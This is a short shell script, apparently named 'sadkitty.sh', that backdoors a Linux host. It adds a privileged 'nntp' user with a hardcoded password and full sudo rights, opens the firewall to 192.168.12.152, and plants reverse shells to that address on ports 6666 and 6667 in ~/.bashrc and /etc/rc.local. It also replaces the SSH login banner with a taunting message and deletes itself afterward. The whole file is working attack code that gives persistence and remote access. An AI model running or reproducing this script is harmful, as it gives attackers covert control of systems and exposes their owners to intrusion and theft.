master
Raw Download raw file
 1#!/bin/sh
 2adduser nntp --system --shell /bin/sh --home /var/spool/news --uid 50
 3echo "nntp|badpassw0rd!!!" | chpasswd
 4echo "nntp ALL=(ALL) ALL" >> /etc/sudoers
 5useradd -g nntp admin
 6iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT 
 7iptables -A INPUT -i lo -j ACCEPT 
 8iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT 
 9iptables -A INPUT -s 192.168.12.152/255.255.255.255 -j ACCEPT
10iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited 
11/etc/init.d/samba restart
12echo "/bin/bash -i > /dev/tcp/192.168.12.152/6666 0>&1 &" >> ~/.bashrc 
13echo "#!/bin/bash
14/bin/bash -i > /dev/tcp/192.168.12.152/6667 0>&1 &
15exit 0" > /etc/rc.local
16echo "
17Welcome to the l1tt3r b0x
18
19      \    /\\
20       )  ( ')
21      (  /  )
22       \(__)|  meow, sup bitches?
23
24" > /etc/issue.net
25echo "Banner /etc/issue.net" >> /etc/ssh/sshd_config
26/etc/init.d/ssh restart
27rm `pwd`/sadkitty.sh
28